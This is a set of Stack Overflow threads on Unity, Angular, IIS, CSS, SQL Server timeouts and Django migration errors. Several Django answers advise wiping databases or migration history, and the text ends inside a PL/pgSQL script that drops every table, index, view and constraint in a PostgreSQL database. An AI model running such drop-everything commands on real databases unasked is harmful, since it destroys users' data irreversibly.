dba7576baeda4bba5199d63918f16f7ef241783e | Stackoverflow Stackexchange
Q: Installation fails when trying to install Unity AndroidPlayer on macOS
I'm having trouble installing the latest version of Unity's AndroidPlayer (v5.6.1f1) on my MacBook Pro (macOS version 10.12.5).
I already have Unity installed and working; all I'm trying to do is add the ability to run my games on an Android device (I have the Android SDK configured and working from my previous Android app development).
I'm running the pkg file that I got from Unity, called UnitySetup-Android-Support-for-Editor-5.6.1f1.pkg, and going through the installation process, but after the installer begins to install the software, it fails. Looking at the logs, it states: PackageKit: Session UUID file exists - will not overwrite [some long path]/[filename].activeSandbox
Does anyone know what the problem could be? I've even restarted my Mac and re-downloaded the file, to no avail...
A: I managed to install Android support by using the full Unity3D installer and making sure that Android support was selected. It could be a specific problem with the AndroidPlayer installation package.
A: I managed to resolve the issue by installing the required packages from the Unity Hub, instead of manually downloading and installing them.
Start Unity Hub -> click Installs -> reveal Add Modules by clicking the vertical three dots, and select the required modules by clicking the checkboxes.
A: If anyone else runs into this and is unable to see the Add Modules button described in the other answer, you need to install the editor through Unity Hub in order to see that option.
I removed the old editor, went to:
https://unity3d.com/get-unity/download/archive
and then clicked the Unity Hub button for the specific version I was using. That way you're able to Add Modules :)
| stackoverflow | {
"language": "en",
"length": 279,
"provenance": "stackexchange_0000F.jsonl.gz:899864",
"question_score": "11",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651450"
} |
89603a92f5079041c795dfe6cc8ef766da7a9498 | Stackoverflow Stackexchange
Q: How do I call a function every 10 seconds in Angular 2?
How do I call a function at a set time interval in Angular 2? I want it to be called/triggered at specific time intervals (e.g., 10 seconds).
For example, in the .ts file:
num: number = 0;
array: number[] = [1, 5, 2, 4, 7];

callFunctionAtIntervals() {
  // Advance to the next index, wrapping back to 0 past the end of the array
  this.num = (this.num + 1) % this.array.length;
}
HTML:
<div>{{ array[num] }}</div>
So basically the div value will change at intervals
A: You may also try the traditional setInterval function.
setInterval(() => {
  this.callFunctionAtIntervals();
}, 10000); // interval in milliseconds; 10000 ms = 10 seconds
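One caveat (an addition, not part of the original answer): a raw setInterval keeps firing after the component is destroyed, so the handle should be cleared in ngOnDestroy. A minimal sketch, assuming a standard Angular component (class and field names are illustrative):
import { OnDestroy } from '@angular/core';

export class TickerComponent implements OnDestroy {
  num = 0;
  array = [1, 5, 2, 4, 7];
  // Keep the handle so the timer can be stopped later
  private intervalId = setInterval(() => {
    this.num = (this.num + 1) % this.array.length;
  }, 10000);

  ngOnDestroy(): void {
    clearInterval(this.intervalId); // stop the timer when the component goes away
  }
}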
A: In your TS logic, define an observable based on an "interval", which will emit the values 0, 1, 2, 3, 4, 0, 1, ...
this.index = Observable.interval(10000).map(n => n % this.array.length);
In your component, unwrap that observable using async and use it to index into the array.
{{array[index | async]}}
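Note that Observable.interval(...).map(...) is the RxJS 5 prototype-operator style. With RxJS 6 and later, the same idea uses pipeable operators; a sketch, assuming the same array field:
import { interval } from 'rxjs';
import { map } from 'rxjs/operators';

// Emits 0, 1, 2, 3, 4, 0, 1, ... every 10 seconds
this.index = interval(10000).pipe(map(n => n % this.array.length));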
A: Observable.interval(10000).takeWhile(() => true).subscribe(() => this.function());
An infinite loop in which this.function() is called every 10 seconds. (The takeWhile(() => true) predicate never becomes false, so the stream runs until unsubscribed.)
A: Please check below; it might be helpful.
My requirement: every 5 seconds, call a service; if we get back the required data, stop calling the service and continue with the next flow. Otherwise, call the service again after 5 seconds.
Conditions to stop the service invocation: after a maximum number of retries (in my case 20) or after a certain amount of time (in my case 120 seconds).
Note: I was using TypeScript.
let maxTimeToRetry = 120000; // in ms
let retryCount = 0;
let retryTimeout = 5000; // in ms
let maxRetries = 20;
const startTime = new Date().getTime();
// Capture `this` as `self`, since a classic function gets its own `this` inside setInterval
const self = this;
const interval = setInterval(function () {
retryCount++; // INCREMENT RETRY COUNTER
self.service.getData(requestParams).subscribe(result => {
if (result.conditionTrue) {
clearInterval(interval); // to stop the timer or to stop further calling of service
//any execution after getting data
}
});
if ((new Date().getTime() - startTime > maxTimeToRetry) || (retryCount === maxRetries)) {
clearInterval(interval);
// any execution
}
}, retryTimeout);
| stackoverflow | {
"language": "en",
"length": 326,
"provenance": "stackexchange_0000F.jsonl.gz:899866",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651463"
} |
a466fe14ec3cb44d59e6a72f58696279f4871a70 | Stackoverflow Stackexchange
Q: List redirect destinations (URLs) of IIS sites
I have several redirect sites configured in IIS 8.5, and I want to list them all. I've tried:
.\appcmd.exe list site * -section:system.webServer/httpRedirect
but wildcards do not work well with appcmd. I also tried, from the WebAdministration module:
Get-WebConfiguration system.webServer/httpRedirect * | Get-Member destination
but this also does not deliver what I need, which is a list with two columns: site and destination.
A: This snippet will give you the site names and httpRedirect destinations:
Get-Website | select name,@{name='destination';e={(Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name "destination" -PSPath "IIS:\Sites\$($_.name)").value}}
For fetching just the destinations:
(Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name "destination" -PSPath 'IIS:\Sites\*').value
A: You can refer to the function below to address this issue.
Function Get-IISRedirectURLs {
[CmdletBinding()]
Param
(
[Parameter(Mandatory=$false)][String]$SiteName
)
If ([String]::IsNullOrEmpty($SiteName)) {
Get-Website | ForEach-Object {
$SiteName = $_.Name
$prop = Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name 'destination' -PSPath "IIS:\Sites\$SiteName"
Write-Host "$SiteName`t$($prop.value)"
}
} Else {
$prop = Get-WebConfigurationProperty -filter /system.webServer/httpRedirect -name 'destination' -PSPath "IIS:\Sites\$SiteName"
Write-Host "$SiteName`t$($prop.value)"
}
}
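For reference, a quick usage sketch (assuming the function above is already loaded in the current session; the site name is illustrative):
# List site name and redirect destination for every site
Get-IISRedirectURLs

# Or query a single site
Get-IISRedirectURLs -SiteName 'Default Web Site'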
For the complete sample archive, please download from How to list redirect destination URLs of IIS sites by PowerShell
| stackoverflow | {
"language": "en",
"length": 181,
"provenance": "stackexchange_0000F.jsonl.gz:899880",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651512"
} |
1d57dc6e43007f2faced367d859846a2d6e2adad | Stackoverflow Stackexchange
Q: Is there any guide for making KeystoneJS work with a PostgreSQL database?
KeystoneJS looks like a great CMS framework; however, it claims to work with MongoDB only.
Do you think it's technically feasible to make KeystoneJS support PostgreSQL with the least effort?
Is there any guide related to it?
| stackoverflow | {
"language": "en",
"length": 50,
"provenance": "stackexchange_0000F.jsonl.gz:899885",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651533"
} |
ba47817f99d67cdd2d2de9b9c06871e833c7181c | Stackoverflow Stackexchange
Q: Correct function using Math.random() to get a 50/50 chance
Which is the correct function for getting a precise 50/50 chance:
return Math.random() < 0.5;
Vs
return Math.random() <= 0.5;
A: Math.random():
The Math.random() function returns a floating-point, pseudo-random number in the range [0, 1); that is, from 0 (inclusive) up to but not including 1 (exclusive)
The random number is either in the range [0,0.5) or [0.5,1). So you should use return Math.random() < 0.5; to have a (theoretical) 50/50 chance.
A: The first one is correct, because the random number generator returns a number from 0 up to, but not including, 1 (the exact upper value depends on the precision of the generator itself).
So by splitting the values into two groups using the "<" operator, you get two equal ranges:
[0, 0.5) and [0.5, 1)
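As a quick sanity check (an addition, not from either answer), you can sample the comparison many times and confirm the ratio hovers near 50%:
// Count how often Math.random() < 0.5 over many trials
let hits = 0;
const trials = 1000000;
for (let i = 0; i < trials; i++) {
  if (Math.random() < 0.5) hits++;
}
console.log(hits / trials); // prints a value close to 0.5, up to sampling noise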
| stackoverflow | {
"language": "en",
"length": 134,
"provenance": "stackexchange_0000F.jsonl.gz:899889",
"question_score": "35",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651537"
} |
784117b4f7bc3984c4c7ce93db2c7bd7c8a9ba04 | Stackoverflow Stackexchange
Q: Inspecting contents from SFSafariViewController on iPhone
We have an Ionic app and are trying to make use of the "embedded Safari", SFSafariViewController, for displaying web contents.
We use the cordova-plugin-browsertab plugin.
The problem is: how can we debug/inspect anything from inside that embedded Safari? In Safari, normal inspection just inspects the "root" app contents, but I cannot see any reference anywhere to the document opened with the embedded Safari.
| stackoverflow | {
"language": "en",
"length": 70,
"provenance": "stackexchange_0000F.jsonl.gz:899912",
"question_score": "4",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651611"
} |
0a937d0213e742e80322ff7c60d446e67e7f73e5 | Stackoverflow Stackexchange
Q: Referencing another project in .NET Core
I have 6 projects in a blank solution. I just want to reference one project from another. I have HomeController in the Blog.Web project, and I want to access another project's members, like IOrganizationService in the Blog.Services project. How can I use IOrganizationService's methods in the HomeController class? (The question originally included a screenshot for clarity; red marks showed the errors.)
A: It looks like you've created everything as web sites, but I suspect that most of those projects should actually be class libraries (DLLs), not sites. You might need to reset a few things!
You should be able to right-click on the Dependencies node, or on the project node itself, to add a project reference (the original answer illustrated this with screenshots, omitted here).
Alternatively: edit the csproj and add a <ProjectReference> node, as the next answer shows.
A: Edit your MyProject.csproj file. And add a new ItemGroup or add your package into an existing ItemGroup. Here's example:
<ItemGroup>
<PackageReference Include="Polly" Version="7.2.0" />
<ProjectReference Include="..\SomeOtherProject\SomeOtherProject.csproj" />
</ItemGroup>
A: Simply upgrade your Visual Studio to 2022; it supports .NET Core up to 6.0 and is also compatible with older .NET Core SDKs.
A: If you're doing this in Visual Studio Code, or you just want to use the CLI to accomplish the same task, you can also use the dotnet CLI command dotnet add reference [relative_path_to_project].
So for example:
dotnet add reference ../Api/MyApiProject.csproj
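After adding the reference either way, you can verify it from the CLI (run from the referencing project's directory):
dotnet list reference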
| stackoverflow | {
"language": "en",
"length": 219,
"provenance": "stackexchange_0000F.jsonl.gz:899916",
"question_score": "22",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651629"
} |
20b827596f83524a4994b8e65493a3c8d177b4cf | Stackoverflow Stackexchange
Q: How can I add a black layer over the top of an image, with opacity?
I would like to know if there is a way I can add a black layer over my image but have it slightly transparent, so you can still see the image.
I am using Bootstrap 4, and below is the code I am using, including the CSS :)
Any help will be much appreciated. Thank you.
<div class="row">
<div class="col-md-6">
<div class="card-overlay" style="background-image: url('img/dirt1.jpg')">
<div class="white-text text-center">
<div class="card-block">
<h3>Project title</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Repellat
fugiat, laboriosam, voluptatem, optio vero odio nam sit officia accusamus
minus error nisi architecto nulla ipsum dignissimos. Odit
sed qui, dolorum!.
</p>
<a class="btn btn-primary" href="...">Read More</a>
</div>
</div>
</div>
</div>
</div>
CSS:
.card-overlay {
background: rgba(0, 0, 0, 0.5);
}
A: CSS
.container { background-color: #000000;}
.container img { opacity: 0.2; }
HTML
<div class="container">
<img src="#">
</div>
A: You can use after/before for this
.card-overlay{
position: relative;
}
.card-overlay:after {
content:'';
position:absolute;
left:0px;
top:0px;
width:100%;
height:100%;
background: rgba(0, 0, 0, 0.5);
}
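One caveat with this pseudo-element approach (a note, not part of the original answer): the overlay sits on top of the card's content, so links and buttons underneath can become unclickable unless the inner content is raised above it, e.g.:
/* Raise the card content above the overlay pseudo-element */
.card-overlay .card-block {
  position: relative;
  z-index: 1;
}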
A: You have to put the .card-overlay div inside a div with the background. This is because if an element has both a background image and a background color, the background color will appear behind the background image.
.card-overlay {
background: rgba(0, 0, 0, 0.5);
}
<div class="row">
<div class="col-md-6">
<div style="background-image: url('https://placekitten.com/640/360');background-size:cover;">
<div class="card-overlay">
<div class="white-text text-center">
<div class="card-block">
<h3>Project title</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Repellat fugiat, laboriosam, voluptatem, optio vero odio nam sit officia accusamus minus error nisi architecto nulla ipsum dignissimos. Odit
sed qui, dolorum!.</p>
<a class="btn btn-primary" href="...">Read More</a>
</div>
</div>
</div>
</div>
</div>
</div>
If you didn't want to change your HTML structure you could use CSS3 multiple background with a gradient rather than a background color, because you can't layer background colors.
.card-overlay {
background:
linear-gradient(
rgba(0, 0, 0, 0.5),
rgba(0, 0, 0, 0.5)
),
url('https://placekitten.com/640/360');
}
<div class="row">
<div class="col-md-6">
<div class="card-overlay">
<div class="white-text text-center">
<div class="card-block">
<h3>Project title</h3>
<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit. Repellat
fugiat, laboriosam, voluptatem, optio vero odio nam sit officia accusamus
minus error nisi architecto nulla ipsum dignissimos. Odit
sed qui, dolorum!.</p>
<a class="btn btn-primary" href="...">Read More</a>
</div>
</div>
</div>
</div>
</div>
A: Try this:
.card-overlay { position: relative; }
.card-overlay:before {
  background: rgba(37, 35, 35, 0.07);
  position: absolute;
  height: 100%;
  left: 0;
  top: 0;
  margin: 0;
  width: 100%;
  content: ' ';
  display: block;
}
| stackoverflow | {
"language": "en",
"length": 408,
"provenance": "stackexchange_0000F.jsonl.gz:899917",
"question_score": "10",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651630"
} |
1b236822294be47d75cdb8db9c542cf79dce4109 | Stackoverflow Stackexchange
Q: Resource limit on SQL Server linked server
I'm frequently receiving the following error from a stored procedure that uses OPENQUERY to read via a linked server.
The OLE DB provider "SQLNCLI11" for linked server "BrackleyICS"
reported an error. Execution terminated by the provider because a
resource limit was reached.
This usually happens at 10.01 minutes, which would imply a timeout setting; however, on other occasions it runs fine, taking 35 minutes to complete.
Has anyone encountered this?
A: You can check your current timeout settings as follows:
query timeout
right click server > Properties > Connections > Remote Query Timeout
login timeout
right click server > Properties > Advanced > Remote Login Timeout
I think your login timeout is set to 10 minutes; you need to increase it by running the script below, changing the value from 30 seconds to the one you require:
sp_configure 'remote login timeout', 30
go
reconfigure with override
go
Why it does not time out every time:
I'm not sure, but if a user is logged on to the server, the timeout doesn't seem to happen.
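As an aside (an addition to the answer above), both settings can also be inspected from T-SQL with sp_configure; a sketch:
-- Show current remote timeout values; enable advanced options first
-- in case the entries are hidden on your instance
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'remote query timeout (s)';
EXEC sp_configure 'remote login timeout (s)';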
A: A linked server also has its own Query Timeout setting, in Linked Server -> Properties -> Server Options. It is likely set to 0, which is the default value.
In that case it uses the Query Wait advanced server setting, which again is most likely set to -1 (the default).
In that case the timeout is decided per query, calculated as 25 times the estimated query cost.
More info in MSDN
A:
EXEC sys.sp_configure N'remote query timeout (s)', N'1800'
GO
RECONFIGURE WITH OVERRIDE
GO
The default value is 600 seconds, which is equal to 10 minutes.
| stackoverflow | {
"language": "en",
"length": 270,
"provenance": "stackexchange_0000F.jsonl.gz:899929",
"question_score": "3",
"source": "stackexchange",
"timestamp": "2023-03-29T00:00:00",
"url": "https://stackoverflow.com/questions/44651672"
} |
f6eb374e6e8619b957a2be639a7d6d5fa07c81b5 | Stackoverflow Stackexchange
Q: django.db.migrations.exceptions.InconsistentMigrationHistory
When I run python manage.py migrate on my Django project, I get the following error:
Traceback (most recent call last):
File "manage.py", line 22, in <module>
execute_from_command_line(sys.argv)
File "/home/hari/project/env/local/lib/python2.7/site- packages/django/core/management/__init__.py", line 363, in execute_from_command_line
utility.execute()
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/__init__.py", line 355, in execute
self.fetch_command(subcommand).run_from_argv(self.argv)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/base.py", line 283, in run_from_argv
self.execute(*args, **cmd_options)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/base.py", line 330, in execute
output = self.handle(*args, **options)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/core/management/commands/migrate.py", line 86, in handle
executor.loader.check_consistent_history(connection)
File "/home/hari/project/env/local/lib/python2.7/site-packages/django/db/migrations/loader.py", line 298, in check_consistent_history
connection.alias,
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration admin.0001_initial is applied before its dependency account.0001_initial on database 'default'.
I have a user model like below:
class User(AbstractUser):
place = models.CharField(max_length=64, null=True, blank=True)
address = models.CharField(max_length=128, null=True, blank=True)
How can I solve this problem?
A: Solved by commenting out the admin app before migrating. In settings.py:
django.contrib.admin
and in urls.py:
('admin/', admin.site.urls)
Uncomment both after the migrate completes.
A: The django_migrations table in your database is the cause of the inconsistency, and deleting the migrations from the local path alone won't work.
You have to truncate the django_migrations table in your database and then try applying the migrations again. It should work, but if it does not, run makemigrations again and then migrate.
Note: don't forget to take a backup of your data.
A: This happened to me in a new project after I added a custom User model, per the recommendation in the django docs.
If you’re starting a new project, it’s highly recommended to set up a custom user model, even if the default User model is sufficient for you.
Here is what I did to solve the problem.
*
*Delete the database db.sqlite3.
*Delete the app/migrations folder.
Per @jackson, temporarily comment out django.contrib.admin.
INSTALLED_APPS = [
...
#‘django.contrib.admin’,
...
]
Also comment out the admin site in urls.py:
urlpatterns = [
path('profile/', include('restapp.urls')),
#path('admin/', admin.site.urls),
]
If you don't comment out the path('admin/'), you will get error "LookupError: No installed app with label 'admin'" when you run
python manage.py migrate
After the migrations finish, uncomment both of the above.
A: Here is how to solve this properly.
Follow these steps in your project's migrations folder:
*
*Delete the __pycache__ folder and the 0001_initial files.
*Delete db.sqlite3 from the root directory (be careful: all your data will go away).
*On the terminal, run:
python manage.py makemigrations
python manage.py migrate
Voila.
A: Just delete all the migrations folders, __pycache__, .pyc files:
find . | grep -E "(__pycache__|\.pyc|\.pyo$|migrations)" | xargs rm -rf
then, run:
python manage.py makemigrations
python manage.py migrate
A: When you make changes to the default user model, or create a custom user model via AbstractUser, you will often face this error.
1: Remember that when we create a superuser, we log in with a username and password; but if you set USERNAME_FIELD = 'email', you can no longer log in with a username and password, because your username field has been converted to email.
And if you try to create another superuser, it will not ask for a username; it will only ask for email and password. Then, after creating the superuser with email and password, when you try to log in to the admin panel it will throw that error, because there is no username and the username field is required.
2: That's why, after creating a custom user model, migrate will throw the error. To resolve it, first add AUTH_USER_MODEL = 'appname.custommodelname' in your settings.py (appname is the app where you defined your custom user model, and custommodelname is the name you gave that model).
3: Then delete the migrations folder of the app where you created the custom user model, and delete the project's database db.sqlite3.
4: Now run the migrations: python manage.py makemigrations appname (the app where you defined your custom user model).
5: Then migrate with python manage.py migrate.
6: That's it; now it is done.
A: Problem
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration admin.0001_initial is applied before its dependency account.0001_initial on database 'default'.
So we can first migrate the database without admin (admin.0001_initial).
After its dependency has been migrated, we execute the commands again to migrate admin.0001_initial.
Solution
*
*remove 'django.contrib.admin' from INSTALLED_APPS in settings.py.
*execute the commands:
python manage.py makemigrations appname
python manage.py migrate appname
*add 'django.contrib.admin' back to INSTALLED_APPS in settings.py.
*execute the commands again:
python manage.py makemigrations appname
python manage.py migrate appname
A: In my case the problem was with how pytest started: I just altered --reuse-db to --create-db, ran pytest, and changed it back. This fixed my problem.
A: You can directly delete db.sqlite3; then, when you migrate, a new database is automatically generated. That should fix it.
rm db.sqlite3
python manage.py makemigrations
python manage.py migrate
A: Just delete the sqlite file, or flush the database with 'python manage.py flush',
and then run the makemigrations and migrate commands respectively.
A: When you create a new Django project and run
python manage.py migrate
Django will create 10 tables for you by default, including one auth_user table and two more whose names start with auth_user.
When you want to create a custom user model inheriting from AbstractUser after that, you will encounter this problem, with an error message as follows:
django.db.migrations.exceptions.InconsistentMigrationHistory: Migration admin.0001_initial is applied before its dependency account.0001_initial on database 'default'.
I solved this problem by dropping my entire database and creating a new one, which replaced the three tables I mentioned.
A: Your error is essentially:
Migration "B" is applied before its dependency "A" on database 'default'.
Sanity check: first, open your database and look at the records in the django_migrations table. Records should be listed in chronological order (e.g., A, B, C, D...).
Make sure that the name of the "A" migration listed in the error matches the name of the "A" migration listed in the database. (They can differ if you previously manually edited, deleted, or renamed migration files.)
To fix this, rename migration A, either in the database or in the filename. BUT make sure the changes match up with what other developers on your team have in their databases (or with what is on your production database).
A: The order of INSTALLED_APPS seems important.
If you always put your recent work at the top/beginning of the list, it will always be loaded properly with regard to django.contrib.admin. Moving my apps to the beginning of the INSTALLED_APPS list fixed this problem for me.
The reason Kun Shi's solution may have worked is that it ran the migrations in a different order.
A: Since you are using a custom User model, you can do 4 steps:
*
*Comment out django.contrib.admin in your INSTALLED_APPS settings
INSTALLED_APPS = [
...
#'django.contrib.admin',
...
]
*Comment out admin path in urls.py
urlpatterns = [
...
#path('admin/', admin.site.urls)
...
]
*Then run
python manage.py migrate
*When done, uncomment all back
A: Lets start off by addressing the issue with most of the answers on this page:
You never have to drop your database if you are using Django's migration system correctly and you should never delete migrations once they are comitted
Now the best solution for you depends on a number of factors which include how experienced you are with Django, what level of understanding you have of the migration system, and how valuable the data in your database is.
In short there are two ways you can address any migration error.
*
*Take the nuclear option. Warning: this is only an option if you are working alone. If other people depend on existing migrations you cannot just delete them.
*
*Delete all of your migrations, and rebuild a fresh set with python3 -m manage makemigrations. This should remove any problems you had with dependencies or inconsistencies in your migrations.
*Drop your entire database. This will remove any problems caused by inconsistencies between your actual database schema and the schema you should have based on your migration history, and will remove any problems caused by inconsistencies between your migration history and your previous migration files [this is what the InconsistentMigrationHistory is complaining about].
*Recreate your database schema with python3 -m manage migrate
*Determine the cause of the error and resolve it, because (speaking from experience) the cause is almost certainly something silly you did. (Generally as a result of not understanding how to use the migration system correctly). Based on the error's I've caused there are three categories.
*
*Inconsistencies with migration files. This is a pretty common one when multiple people are working on a project. Hopefully your changes do not conflict and makemigrations --merge can solve this one, otherwise someone is going to have to roll back their migrations to the branching point in order to resolve this.
*Inconsistencies between your schema and your migration history. To manage this someone will have either edited the database schema manually, or deleted migrations. If they deleted a migration, then revert their changes and yell at them; you should never delete migrations if others depend on them. If they edited the database schema manually, revert their changes and then yell at them; Django is managing the database schema, no one else.
*Inconsistencies between your migration history and your migrations files. [This is the InconsistentMigrationHistory issue the asker suffers from, and the one I suffered from when I arrived at this page]. To manage this someone has either manually messed with the django_migrations table or deleted a migration after it was applied. To resolve this you are going to have to work out how the inconsistency came about and manually resolve it. If your database schema is correct, and it is just your migration history that is wrong you can manually edit the django_migrations table to resolve this. If your database schema is wrong then you will also have to manually edit that to bring it in line with what it should be.
Based on your description of the problem and the answer you selected I'm going to assume you are working alone, are new to Django, and don't care about your data. So the nuclear option may be right for you.
If you are not in this situation and the above text looks like gibberish, then I suggest asking the Django User's Mailing List for help. There are very helpful people there who can help walk you through resolving the specific mess you are in.
Have faith, you can resolve this error without going nuclear!
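For the manual-resolution path described above, the bookkeeping lives in the django_migrations table; a sketch of how to inspect it (plain SQL, valid in any database Django supports):
-- Each row records one applied migration: app label, migration name, timestamp
SELECT app, name, applied
FROM django_migrations
ORDER BY applied;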
A: Before performing any other steps, back up your database. Then back it up again.
Remove any custom user model code out of the way, disable your custom model and app in settings, then:
python manage.py dumpdata auth --natural-primary --natural-foreign > auth.json
python manage.py migrate auth zero # This will also revert out the admin migrations
Then add in your custom model, set it in settings, and re-enable the app. Make sure you have no migrations on this app yet.
Then:
python manage.py makemigrations <your-app>
python manage.py migrate
python manage.py loaddata auth.json # Assumes your user-model isn't TOO dissimilar to the standard one.
Done!
A: There is another reason besides user error that can lead to this sort of problem: a known issue with Django when it comes to squashed migrations.
We have a series of migrations that work perfectly fine in Python 2.7 + Django 1.11. Running makemigrations or migrate always works as it should, etc., even (for the purpose of testing) when the database is freshly re-created.
However, as we move a project to Python 3.6 (currently using the same Django 1.11) I've been stuck trying to figure out why the same migrations apply just fine only the first time they are run. After that, any attempt to run makemigrations or even just migrate results in the error:
django.db.migrations.exceptions.InconsistentMigrationHistory
wherein migration foo.0040-thing is applied before its dependency foo.0038-something-squashed-0039-somethingelse (we only happen to have that one squashed migration... the rest are much more straightforward).
What's bugged me for a while is why this only happens on Python 3. If the DB is truly inconsistent this should be happening all the time. That the migrations appear to work perfectly fine the first time they are applied was equally confounding.
After much searching (including the present Q&A thread), I stumbled upon the aforementioned Django bug report. Our squash migration did indeed use the b prefix in the replaces line (e.g., replaces = [(b'', 'foo.0038-defunct'),.......]
Once I removed the b prefixes from the replaces line it all worked normally.
A: If you are working on an empty database a quick fix could be running the migrations for the account app, before any other app migrations.
$ ./manage.py migrate account
And then:
$ ./manage.py migrate
A: How to fix (Without delete migration folder or entire database)
*
*Backup your database
*Comment out your app in INSTALLED_APPS and AUTH_USER_MODEL = 'account.User' in your settings.py
*python manage.py migrate admin zero
*Undo step 2
*python manage.py migrate
Why did this problem occur?
The django admin app depends on AUTH_USER_MODEL, which is the default auth model when you create your Django project.
If you migrate your project's models before changing AUTH_USER_MODEL, the admin app applies its migration with the django auth model as its dependency. However, you then change that dependency and want to migrate the models again. That is where the problem occurs: the admin models were applied before their dependency, which is now your User model, was applied. Thus, you should revert the admin model migrations and then try again.
A: First delete all the migrations and db.sqlite3 files and follow these steps:
$ ./manage.py makemigrations myapp
$ ./manage.py squashmigrations myapp 0001 (the number may differ)
Delete the old migration file, and finally:
$ ./manage.py migrate
A: If that exception revealed itself while you were trying to create your own User model instead of the standard one, follow this instruction.
I found my problem resolved by following these steps:
*Create a custom user model identical to auth.User, call it User (so
many-to-many tables keep the same name) and set db_table='auth_user'
(so it uses the same table)
*Throw away all your migrations
*Recreate a fresh set of migrations
*Sacrifice a chicken, perhaps two if you're anxious; also make a backup of your database
*Truncate the django_migrations table
*Fake-apply the new set of migrations
*Unset db_table, make other changes to the custom model, generate migrations, apply them
It is highly recommended to do this on a database that enforces
foreign key constraints. Don't try this on SQLite on your laptop and
expect it to work on Postgres on the servers!
A: If you set AUTH_USER_MODEL in settings.py like this:
AUTH_USER_MODEL = 'custom_user_app_name.User'
you should comment out this line before running the makemigrations and migrate commands. Then you can uncomment this line again.
A: When you create a new project with no apps and you run
python manage.py migrate
Django will create 10 tables by default.
If you want to create a custom user model inheriting from AbstractUser after that, you will encounter this problem, with the following message:
django.db.migrations.exceptions.InconsistentMigrationHistory:
Migration admin.0001_initial is applied before its dependency
account.0001_initial on database 'default'.
Finally, I dropped my entire database and ran the migrations again.
A: I encountered this when migrating from Wagtail 2.0 to 2.4, but have seen it a few other times when a third party app squashes a migration after your current version but before the version you’re migrating to.
The shockingly simple solution in this case at least is:
./manage.py migrate
./manage.py makemigrations
./manage.py migrate
i.e. run a single migrate before trying to makemigrations.
A: This problem comes up most of the time if you extend the User model after the initial migration, because whenever you extend AbstractUser it recreates the basic fields that were present in the model, like email, first_name, etc.
The same applies to any abstract model in Django.
So a very simple solution is to either create a new database and then apply migrations, or delete the same database [all your data will be deleted in this case] and reapply migrations.
A: I had to drop my database too, and then run makemigrations and migrate again, for this to be resolved on my part.
A: Delete the migrations folder and db.sqlite3, and type in the cmd:
python manage.py makemigrations
A: django.db.migrations.exceptions.InconsistentMigrationHistory # on creating a custom user model
I had that same issue today, and none of the above solutions worked, so I decided to erase all the data from my local PostgreSQL database using the following command:
-- Drop everything from the PostgreSQL database.
DO $$
DECLARE
q TEXT;
r RECORD;
BEGIN
-- triggers
FOR r IN (SELECT pns.nspname, pc.relname, pt.tgname
FROM pg_catalog.pg_trigger pt, pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace AND pc.oid=pt.tgrelid
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pt.tgisinternal=false
) LOOP
EXECUTE format('DROP TRIGGER %I ON %I.%I;',
r.tgname, r.nspname, r.relname);
END LOOP;
-- constraints #1: foreign key
FOR r IN (SELECT pns.nspname, pc.relname, pcon.conname
FROM pg_catalog.pg_constraint pcon, pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace AND pc.oid=pcon.conrelid
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pcon.contype='f'
) LOOP
EXECUTE format('ALTER TABLE ONLY %I.%I DROP CONSTRAINT %I;',
r.nspname, r.relname, r.conname);
END LOOP;
-- constraints #2: the rest
FOR r IN (SELECT pns.nspname, pc.relname, pcon.conname
FROM pg_catalog.pg_constraint pcon, pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace AND pc.oid=pcon.conrelid
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pcon.contype<>'f'
) LOOP
EXECUTE format('ALTER TABLE ONLY %I.%I DROP CONSTRAINT %I;',
r.nspname, r.relname, r.conname);
END LOOP;
-- indicēs
FOR r IN (SELECT pns.nspname, pc.relname
FROM pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pc.relkind='i'
) LOOP
EXECUTE format('DROP INDEX %I.%I;',
r.nspname, r.relname);
END LOOP;
-- normal and materialised views
FOR r IN (SELECT pns.nspname, pc.relname
FROM pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
AND pc.relkind IN ('v', 'm')
) LOOP
EXECUTE format('DROP VIEW %I.%I;',
r.nspname, r.relname);
END LOOP;
-- tables
FOR r IN (SELECT pns.nspname, pc.relname
FROM pg_catalog.pg_class pc, pg_catalog.pg_namespace pns
WHERE pns.oid=pc.relnamespace
AND pns.nspname NOT IN ('information_schema', 'pg_catalog', 'pg_toast')
